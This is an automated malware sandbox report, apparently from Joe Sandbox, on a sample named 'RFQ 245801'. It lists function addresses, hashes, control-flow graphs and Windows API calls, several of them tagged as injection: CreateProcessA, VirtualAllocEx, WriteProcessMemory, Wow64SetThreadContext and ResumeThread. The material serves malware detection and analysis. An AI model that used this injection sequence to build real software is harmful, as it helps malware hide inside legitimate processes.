                                                                                                                                                                                  • Instruction ID: 9473f3a480973fbbd396543e8796362e290056c3644c3eb9a1bb8bd2e3708977
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c48aae0319caed2001d100c41aec8efba4845c7e2f4add778f549f958715386
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CE1AFB1B016059FEB29DB65C4507AEB7F7AF89701F14846DE18ADB2A0CB35E802CB51
                                                                                                                                                                                  Function 07339684 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9da16dd1c48dd9224136f5d137de4ac0b5435598b3082d7bb0ddf74553afbf09
                                                                                                                                                                                  • Instruction ID: de38e87e85ecffea599ed5950f4c41553c55bee62ade990ec6a5415f91c25676
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9da16dd1c48dd9224136f5d137de4ac0b5435598b3082d7bb0ddf74553afbf09
                                                                                                                                                                                  • Instruction Fuzzy Hash: C0D05EF8C5910CCFE764CF50D0416F8FBBCBB0B304F006091D44EAB225C631A8818E54
                                                                                                                                                                                  Function 0733989E Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: bbac74fdfdb55768450b3d78b5f618906269d45403d30d7ac7c91562cc33e6a7
                                                                                                                                                                                  • Instruction ID: 102b8bbfd52ed81a7fbb5739c13c9beaa562d9abe9c98995e373ac7de562a5bd
                                                                                                                                                                                  • Opcode Fuzzy Hash: bbac74fdfdb55768450b3d78b5f618906269d45403d30d7ac7c91562cc33e6a7
                                                                                                                                                                                  • Instruction Fuzzy Hash: CEA002C5CAF54DC4F0742D721440AB5D07C664B40DE51B81440CF7781A4495E011142D
                                                                                                                                                                                  Function 07335224 Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 81 7335224-73352c5 84 73352c7-73352d1 81->84 85 73352fe-733531e 81->85 84->85 86 73352d3-73352d5 84->86 92 7335320-733532a 85->92 93 7335357-7335386 85->93 87 73352d7-73352e1 86->87 88 73352f8-73352fb 86->88 90 73352e3 87->90 91 73352e5-73352f4 87->91 88->85 90->91 91->91 95 73352f6 91->95 92->93 94 733532c-733532e 92->94 101 7335388-7335392 93->101 102 73353bf-7335479 CreateProcessA 93->102 96 7335351-7335354 94->96 97 7335330-733533a 94->97 95->88 96->93 99 733533e-733534d 97->99 100 733533c 97->100 99->99 103 733534f 99->103 100->99 101->102 104 7335394-7335396 101->104 113 7335482-7335508 102->113 114 733547b-7335481 102->114 103->96 106 73353b9-73353bc 104->106 107 7335398-73353a2 104->107 106->102 108 73353a6-73353b5 107->108 109 73353a4 107->109 108->108 111 73353b7 108->111 109->108 111->106 124 733550a-733550e 113->124 125 7335518-733551c 113->125 114->113 124->125 126 7335510 124->126 127 733551e-7335522 125->127 128 733552c-7335530 125->128 126->125 127->128 131 7335524 127->131 129 7335532-7335536 128->129 130 7335540-7335544 128->130 129->130 132 7335538 129->132 133 7335556-733555d 130->133 134 7335546-733554c 130->134 131->128 132->130 135 7335574 133->135 136 733555f-733556e 133->136 134->133 138 7335575 135->138 136->135 138->138
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07335466
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                                                  • Opcode ID: bff5951d83fd967c1a2c02c83c863ae8d508a88f0c226ee80698b08856410ea1
                                                                                                                                                                                  • Instruction ID: 865fc1ae126d5c988e4c5a847761f93ea6f91676835a07bc36bb8c836e99127a
                                                                                                                                                                                  • Opcode Fuzzy Hash: bff5951d83fd967c1a2c02c83c863ae8d508a88f0c226ee80698b08856410ea1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 64A16DB1D0021ADFEF24CFA8C840BDDBBB2BF44314F14856AE809A7250D7759995CF92
                                                                                                                                                                                  Function 07335230 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 139 7335230-73352c5 141 73352c7-73352d1 139->141 142 73352fe-733531e 139->142 141->142 143 73352d3-73352d5 141->143 149 7335320-733532a 142->149 150 7335357-7335386 142->150 144 73352d7-73352e1 143->144 145 73352f8-73352fb 143->145 147 73352e3 144->147 148 73352e5-73352f4 144->148 145->142 147->148 148->148 152 73352f6 148->152 149->150 151 733532c-733532e 149->151 158 7335388-7335392 150->158 159 73353bf-7335479 CreateProcessA 150->159 153 7335351-7335354 151->153 154 7335330-733533a 151->154 152->145 153->150 156 733533e-733534d 154->156 157 733533c 154->157 156->156 160 733534f 156->160 157->156 158->159 161 7335394-7335396 158->161 170 7335482-7335508 159->170 171 733547b-7335481 159->171 160->153 163 73353b9-73353bc 161->163 164 7335398-73353a2 161->164 163->159 165 73353a6-73353b5 164->165 166 73353a4 164->166 165->165 168 73353b7 165->168 166->165 168->163 181 733550a-733550e 170->181 182 7335518-733551c 170->182 171->170 181->182 183 7335510 181->183 184 733551e-7335522 182->184 185 733552c-7335530 182->185 183->182 184->185 188 7335524 184->188 186 7335532-7335536 185->186 187 7335540-7335544 185->187 186->187 189 7335538 186->189 190 7335556-733555d 187->190 191 7335546-733554c 187->191 188->185 189->187 192 7335574 190->192 193 733555f-733556e 190->193 191->190 195 7335575 192->195 193->192 195->195
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07335466
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                                                  • Opcode ID: e43e2faa389aef46f2063990788ff59cf9c1593202263b125f067c71c1cd6bc3
                                                                                                                                                                                  • Instruction ID: 74c878e31b608b6c444def4cc4d207d1ccfdf8cda2d54c3472a3aa130b4b7f87
                                                                                                                                                                                  • Opcode Fuzzy Hash: e43e2faa389aef46f2063990788ff59cf9c1593202263b125f067c71c1cd6bc3
                                                                                                                                                                                  • Instruction Fuzzy Hash: D3915DB1D00219DFEF24CF68C841BDDBBB2BF44314F14856AE809A7250D7759995CF92
                                                                                                                                                                                  Function 029EB498 Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 196 29eb498-29eb4b7 197 29eb4b9-29eb4c6 call 29ea7a4 196->197 198 29eb4e3-29eb4e7 196->198 204 29eb4dc 197->204 205 29eb4c8 197->205 200 29eb4fb-29eb53c 198->200 201 29eb4e9-29eb4f3 198->201 207 29eb53e-29eb546 200->207 208 29eb549-29eb557 200->208 201->200 204->198 253 29eb4ce call 29eb740 205->253 254 29eb4ce call 29eb731 205->254 207->208 209 29eb57b-29eb57d 208->209 210 29eb559-29eb55e 208->210 215 29eb580-29eb587 209->215 212 29eb569 210->212 213 29eb560-29eb567 call 29ea7b0 210->213 211 29eb4d4-29eb4d6 211->204 214 29eb618-29eb6d8 211->214 217 29eb56b-29eb579 212->217 213->217 246 29eb6da-29eb6dd 214->246 247 29eb6e0-29eb70b GetModuleHandleW 214->247 218 29eb589-29eb591 215->218 219 29eb594-29eb59b 215->219 217->215 218->219 222 29eb59d-29eb5a5 219->222 223 29eb5a8-29eb5b1 call 29ea7c0 219->223 222->223 227 29eb5be-29eb5c3 223->227 228 29eb5b3-29eb5bb 223->228 229 29eb5c5-29eb5cc 227->229 230 29eb5e1-29eb5e5 227->230 228->227 229->230 232 29eb5ce-29eb5de call 29ea7d0 call 29ea7e0 229->232 251 29eb5e8 call 29eba20 230->251 252 29eb5e8 call 29eb9f1 230->252 232->230 235 29eb5eb-29eb5ee 237 29eb5f0-29eb60e 235->237 238 29eb611-29eb617 235->238 237->238 246->247 248 29eb70d-29eb713 247->248 249 29eb714-29eb728 247->249 248->249 251->235 252->235 253->211 254->211
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 029EB6FE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745402178.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_29e0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                                  • Opcode ID: 87e5f47286cf59b76e146213ad115991bcb1e19638d7de6ebfa7857feaf0a48b
                                                                                                                                                                                  • Instruction ID: 9486f69b2306f7d7d5ed48613cb48f10bbd93f71d836d737493d0c880e54f9cd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 87e5f47286cf59b76e146213ad115991bcb1e19638d7de6ebfa7857feaf0a48b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C812470A00B058FDB25DF29D05579ABBF5FF88308F108A29D48AD7A50DB75E946CB90
                                                                                                                                                                                  Function 07334FA0 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 357 7334fa0-7334ff6 360 7335006-7335045 WriteProcessMemory 357->360 361 7334ff8-7335004 357->361 363 7335047-733504d 360->363 364 733504e-733507e 360->364 361->360 363->364
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07335038
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                                                  • Opcode ID: 3a837b8307f28825833d7c8887f70e95bafc2c7b6e1daf89b271a6b67b2f9538
                                                                                                                                                                                  • Instruction ID: 8b5ae534980e79e6e9744655614c265dad740212b993113141392cae945f34b8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a837b8307f28825833d7c8887f70e95bafc2c7b6e1daf89b271a6b67b2f9538
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A2166B19003499FDB10CFA9C880BDEBBF1FF48310F10842AE958A7240D7799950CFA5
                                                                                                                                                                                  Function 07334FA8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 368 7334fa8-7334ff6 370 7335006-7335045 WriteProcessMemory 368->370 371 7334ff8-7335004 368->371 373 7335047-733504d 370->373 374 733504e-733507e 370->374 371->370 373->374
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07335038
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                                                  • Opcode ID: 5bb70b0249643468f5d55b2ec786e10b56135513bb1eab8ab865eee0f3d7f546
                                                                                                                                                                                  • Instruction ID: f56f46ffb57381f6123b38325cfdadb44896598c0235cf2fd1a58c1489697f34
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5bb70b0249643468f5d55b2ec786e10b56135513bb1eab8ab865eee0f3d7f546
                                                                                                                                                                                  • Instruction Fuzzy Hash: 262166B19003599FDB10CFA9C881BDEBBF5FF48310F10842AE918A7250D7799954CFA5
                                                                                                                                                                                  Function 07334E08 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 378 7334e08-7334e5b 381 7334e6b-7334e9b Wow64SetThreadContext 378->381 382 7334e5d-7334e69 378->382 384 7334ea4-7334ed4 381->384 385 7334e9d-7334ea3 381->385 382->381 385->384
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07334E8E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                                                  • Opcode ID: c388fcce0e94ae8f6d2d40ac0068a43cc8c62ae0b8262497cb5d1ba30829e405
                                                                                                                                                                                  • Instruction ID: 37ed33a1b9ab3cbec752fb483d69af64a5c794507a8fe90997e36dc9d2f2a693
                                                                                                                                                                                  • Opcode Fuzzy Hash: c388fcce0e94ae8f6d2d40ac0068a43cc8c62ae0b8262497cb5d1ba30829e405
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D2139B59002498FDB20DFAAC485BEEBBF4AF48324F14842AD459A7241C7789984CFA5
                                                                                                                                                                                  Function 07335091 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 389 7335091-7335125 ReadProcessMemory 393 7335127-733512d 389->393 394 733512e-733515e 389->394 393->394
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07335118
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                                                  • Opcode ID: 1d3920b82001f5c9b6b141c5499cc6f44a27d4c0b551e56404368e47fdc93f4d
                                                                                                                                                                                  • Instruction ID: 07b57fee15155a9a31bfa64c8b9432b7dedaf8fcd4aa4ee5d7ee737eb1ac5bb1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d3920b82001f5c9b6b141c5499cc6f44a27d4c0b551e56404368e47fdc93f4d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E2139B1C002599FCB10DFAAC885AEEFFF5FF48320F10842AE958A7251C7349554CBA4
                                                                                                                                                                                  Function 07334E10 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 398 7334e10-7334e5b 400 7334e6b-7334e9b Wow64SetThreadContext 398->400 401 7334e5d-7334e69 398->401 403 7334ea4-7334ed4 400->403 404 7334e9d-7334ea3 400->404 401->400 404->403
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07334E8E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                                                  • Opcode ID: 264aa345ce607c2da0fedd8975bb60e8c7b82dc022815b6870fb230f39035021
                                                                                                                                                                                  • Instruction ID: 572843eb366706a58687898d23d41cd822401e22e5c1131ab07171fdc00d3d4e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 264aa345ce607c2da0fedd8975bb60e8c7b82dc022815b6870fb230f39035021
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A2129B1D003598FDB20DFAAC4857EEBBF4EF88324F148429D459A7241C7789945CFA5
                                                                                                                                                                                  Function 07335098 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 408 7335098-7335125 ReadProcessMemory 411 7335127-733512d 408->411 412 733512e-733515e 408->412 411->412
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07335118
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                                                  • Opcode ID: f76cbc9fed6e06473edb85a34609634dc5237b937f507a02a55e5832b66e9298
                                                                                                                                                                                  • Instruction ID: 104ef047744abe55b88f88ec53a43275b2312459a7fc92d0886654cf75f7860e
                                                                                                                                                                                  • Opcode Fuzzy Hash: f76cbc9fed6e06473edb85a34609634dc5237b937f507a02a55e5832b66e9298
                                                                                                                                                                                  • Instruction Fuzzy Hash: 402139B1C003599FDB10DFAAC841AEEFBF5FF48310F108429E958A7250C7389554CBA4
                                                                                                                                                                                  Function 07334EE0 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 416 7334ee0-7334f63 VirtualAllocEx 420 7334f65-7334f6b 416->420 421 7334f6c-7334f91 416->421 420->421
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07334F56
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                  • Opcode ID: bddc1ffb9748747f0855198472050827fe059fbfd0ec33d02912a438db329c2f
                                                                                                                                                                                  • Instruction ID: 914b3e94ed30391aba4c0ddb6ac4819560ec83c678a253191bbf22b819ec4b87
                                                                                                                                                                                  • Opcode Fuzzy Hash: bddc1ffb9748747f0855198472050827fe059fbfd0ec33d02912a438db329c2f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 68114AB68002499FCB20DFA9C845BDEBFF5EB48320F248419E559A7250C7359554CBA1
                                                                                                                                                                                  Function 07334EE8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 434 7334ee8-7334f63 VirtualAllocEx 437 7334f65-7334f6b 434->437 438 7334f6c-7334f91 434->438 437->438
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07334F56
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                  • Opcode ID: 63527c1bfc1e9bcab7784bc83f1d43f5176c1b17b6e7dffd002bd46ac873f2e7
                                                                                                                                                                                  • Instruction ID: d0a0c7c8b2b69916496a52c59450262907172b90a3fde5eead91b9ed555e7180
                                                                                                                                                                                  • Opcode Fuzzy Hash: 63527c1bfc1e9bcab7784bc83f1d43f5176c1b17b6e7dffd002bd46ac873f2e7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 891167B18002499FCB20DFAAC844BEEBFF5EF88320F148419E559A7250C735A540CFA0
                                                                                                                                                                                  Function 07334921 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 425 7334921-7334997 ResumeThread 429 73349a0-73349c5 425->429 430 7334999-733499f 425->430 430->429
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,00000048), ref: 0733498A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                                                  • Opcode ID: 5cbe94e1b7e4f11bfece5e453a44afe1a81ef8191ec582d842333c0aff701f73
                                                                                                                                                                                  • Instruction ID: cade7dcb67a1ca250b25d80a6c4cf61938d63dc5d9de3255e2065185d7867aa4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cbe94e1b7e4f11bfece5e453a44afe1a81ef8191ec582d842333c0aff701f73
                                                                                                                                                                                  • Instruction Fuzzy Hash: 73118BB19003488FCB20DFAAC445BEEFFF4AF88324F14841AC459A7240C735A444CBA4
                                                                                                                                                                                  Function 07334928 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 442 7334928-7334997 ResumeThread 445 73349a0-73349c5 442->445 446 7334999-733499f 442->446 446->445
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,00000048), ref: 0733498A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                                                  • Opcode ID: 35f2ecb5644588d2e104ee004aa9eb705c5d35c30a653617f69a4ce1659b8415
                                                                                                                                                                                  • Instruction ID: a2b1f40a82b72449f6c77a5911c3c2d8edf62faa26094e88828d003abe5f85bb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 35f2ecb5644588d2e104ee004aa9eb705c5d35c30a653617f69a4ce1659b8415
                                                                                                                                                                                  • Instruction Fuzzy Hash: B61136B1D002498FDB20DFAAC445BEEFBF4EB88324F248429D459A7250CB75A944CFA5
                                                                                                                                                                                  Function 029EB698 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 029EB6FE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745402178.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_29e0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                                  • Opcode ID: e6e5e63442d2e7c0a74744f64555cc18c8eb64707badac8dd8b3ca6b4ff200a2
                                                                                                                                                                                  • Instruction ID: 79577e34cfe3d8a5b87f97e06bfd64c127108f09573baf47598ddce8542bf1b2
                                                                                                                                                                                  • Opcode Fuzzy Hash: e6e5e63442d2e7c0a74744f64555cc18c8eb64707badac8dd8b3ca6b4ff200a2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 201110B5C00349CFCB10CF9AC444ADEFBF8BB88328F10842AD819A7610C375A545CFA1
                                                                                                                                                                                  Function 0733A2E1 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 0733A345
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                                                  • Opcode ID: 37bdfe368ead80ed6dea472da5b74b96d3f88ed60734ffe6d2febaaabbad5d3e
